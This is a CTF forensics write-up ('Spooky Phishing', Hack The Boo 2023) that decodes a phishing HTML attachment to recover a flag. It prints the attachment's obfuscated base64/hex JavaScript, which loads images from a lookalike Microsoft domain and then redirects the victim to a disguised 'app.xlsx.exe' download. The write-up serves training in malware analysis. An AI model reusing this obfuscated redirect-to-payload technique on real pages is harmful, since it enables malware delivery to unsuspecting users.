Post

Spooky Phishing

Challenge

  • CTF: Hack The Boo 2023 - Practice Official Writeup
  • Name: Spooky Phishing
  • Category: Forensics
  • Difficulty: Very Easy
  • Points: 300
  • Description: A few citizens of the Spooky Country have been victims of a targeted phishing campaign. Inspired by the Halloween spirit, none of them was able to detect attackers trap. Can you analyze the malicious attachment and find the URL for the next attack stage?
  • Objective: Malware Delivery via Phishing

Files

Download: forensics_spooky_phishing.zip

Writeup

The file index.html is contained in the challenge and contains a base64-encoded payload.

1
2
3
4
5
6
..[snip]..
<input class="li" hidden value="Njg3NDc0NzA3MzNhMmYyZjc3Njk2ZTY0NmY3NzczNmM2OTc2NjU3NTcwNjQ2MTc0NjU3MjJlNjg3NDYyMmY0ODU0NDI3Yjcz">
<input class="il" hidden value="NzAzMDMwNmI3OTVmNzA2ODMxNzM2ODMxNmU2NzVmNzczMTc0Njg1ZjczNzAzMDMwNmI3OTVmNzM3MDcyMzMzNDY0NzM2ODMzMzM3NDczN2QyZjYxNzA3MDJlNzg2YzczNzgyZTY1Nzg2NQ==">
..[snip]..
<script src="data:text/javascript;base64,JChfID0+IHsKCiAgICBjb25zdCBuID0gYXRvYigkKCcuaWwnKS52YWwoKSk7CiAgICBjb25zdCBubiA9IGRlY29kZUhleChuKTsKCiAgICBkb2N1bWVudC5ib2R5LnN0eWxlLmJhY2tncm91bmRJbWFnZSA9ICd1cmwoaHR0cDovL21pY3Jvc29mdGNsb3Vkc2VydmljZXMuY29tL2ltYWdlcy8yNDQwNTc2MjQtYTY1M2MzOTktMWU2NC00NDRlLTg3OTItZTNkZmRjMjA0ZGZkLnBuZyknOwogICAgJCgnI2Jhbm5lcicpLmF0dHIoJ3NyYycsICdodHRwOi8vbWljcm9zb2Z0Y2xvdWRzZXJ2aWNlcy5jb20vaW1hZ2VzLzI0NDA1NzY3OS1mOTcxZjJlNi1hZjRhLTQwZjctOTIyNS03ZDRlOTI5ZWQzYWUucG5nJyk7CgogICAgc2V0VGltZW91dCgoKSA9PiB7CiAgICAgICAgY29uc3QgYSA9IGF0b2IoJCgnLmxpJykudmFsKCkpOwogICAgICAgIGNvbnN0IGFhID0gZGVjb2RlSGV4KGEpOwoKICAgICAgICB3aW5kb3cubG9jYXRpb24uaHJlZiA9IGFhICsgbm47CiAgICB9LCAzNTAwKTsKfSk7CgpmdW5jdGlvbiBkZWNvZGVIZXgoaGV4eCkgewogICAgdmFyIGhleCA9IGhleHgudG9TdHJpbmcoKTsKICAgIHZhciBzdHIgPSAnJzsKICAgIGZvciAodmFyIGkgPSAwOyBpIDwgaGV4Lmxlbmd0aDsgaSArPSAyKQogICAgICAgIHN0ciArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KGhleC5zdWJzdHIoaSwgMiksIDE2KSk7CiAgICByZXR1cm4gc3RyOwp9"></script>
..[snip]..

Decode:

1
echo -n 'JChfID0+IHsKCiAgICBjb25zdCBuID0gYXRvYigkKCcuaWwnKS52YWwoKSk7CiAgICBjb25zdCBubiA9IGRlY29kZUhleChuKTsKCiAgICBkb2N1bWVudC5ib2R5LnN0eWxlLmJhY2tncm91bmRJbWFnZSA9ICd1cmwoaHR0cDovL21pY3Jvc29mdGNsb3Vkc2VydmljZXMuY29tL2ltYWdlcy8yNDQwNTc2MjQtYTY1M2MzOTktMWU2NC00NDRlLTg3OTItZTNkZmRjMjA0ZGZkLnBuZyknOwogICAgJCgnI2Jhbm5lcicpLmF0dHIoJ3NyYycsICdodHRwOi8vbWljcm9zb2Z0Y2xvdWRzZXJ2aWNlcy5jb20vaW1hZ2VzLzI0NDA1NzY3OS1mOTcxZjJlNi1hZjRhLTQwZjctOTIyNS03ZDRlOTI5ZWQzYWUucG5nJyk7CgogICAgc2V0VGltZW91dCgoKSA9PiB7CiAgICAgICAgY29uc3QgYSA9IGF0b2IoJCgnLmxpJykudmFsKCkpOwogICAgICAgIGNvbnN0IGFhID0gZGVjb2RlSGV4KGEpOwoKICAgICAgICB3aW5kb3cubG9jYXRpb24uaHJlZiA9IGFhICsgbm47CiAgICB9LCAzNTAwKTsKfSk7CgpmdW5jdGlvbiBkZWNvZGVIZXgoaGV4eCkgewogICAgdmFyIGhleCA9IGhleHgudG9TdHJpbmcoKTsKICAgIHZhciBzdHIgPSAnJzsKICAgIGZvciAodmFyIGkgPSAwOyBpIDwgaGV4Lmxlbmd0aDsgaSArPSAyKQogICAgICAgIHN0ciArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKHBhcnNlSW50KGhleC5zdWJzdHIoaSwgMiksIDE2KSk7CiAgICByZXR1cm4gc3RyOwp9' | base64 -d

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$(_ => {

    const n = atob($('.il').val());
    const nn = decodeHex(n);

    document.body.style.backgroundImage = 'url(http://microsoftcloudservices.com/images/244057624-a653c399-1e64-444e-8792-e3dfdc204dfd.png)';
    $('#banner').attr('src', 'http://microsoftcloudservices.com/images/244057679-f971f2e6-af4a-40f7-9225-7d4e929ed3ae.png');

    setTimeout(() => {
        const a = atob($('.li').val());
        const aa = decodeHex(a);

        window.location.href = aa + nn;
    }, 3500);
});

function decodeHex(hexx) {
    var hex = hexx.toString();
    var str = '';
    for (var i = 0; i < hex.length; i += 2)
        str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
    return str;
}

The decodeHex() function takes .li and .il from the index.html and decodes a payload. The following JavaScript was used to decode the HTB{} flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
// Constants from index.html
const li="Njg3NDc0NzA3MzNhMmYyZjc3Njk2ZTY0NmY3NzczNmM2OTc2NjU3NTcwNjQ2MTc0NjU3MjJlNjg3NDYyMmY0ODU0NDI3Yjcz"
const il="NzAzMDMwNmI3OTVmNzA2ODMxNzM2ODMxNmU2NzVmNzczMTc0Njg1ZjczNzAzMDMwNmI3OTVmNzM3MDcyMzMzNDY0NzM2ODMzMzM3NDczN2QyZjYxNzA3MDJlNzg2YzczNzgyZTY1Nzg2NQ=="

// Decode function from js base64 script from index.html
function decodeHex(hexx) {
    var hex = hexx.toString();
    var str = '';
    for (var i = 0; i < hex.length; i += 2)
        str += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
    return str;
}

// Decode variables
const n = atob(il);
const nn = decodeHex(n);
const a = atob(li);
const aa = decodeHex(a);
const aa_nn = aa + nn;
console.log(aa_nn)

Output:

1
https://windowsliveupdater.htb/HTB{sp00ky_ph1sh1ng_w1th_sp00ky_spr34dsh33ts}/app.xlsx.exe

Flag: HTB{sp00ky_ph1sh1ng_w1th_sp00ky_spr34dsh33ts}

This post is licensed under CC BY 4.0 by the author.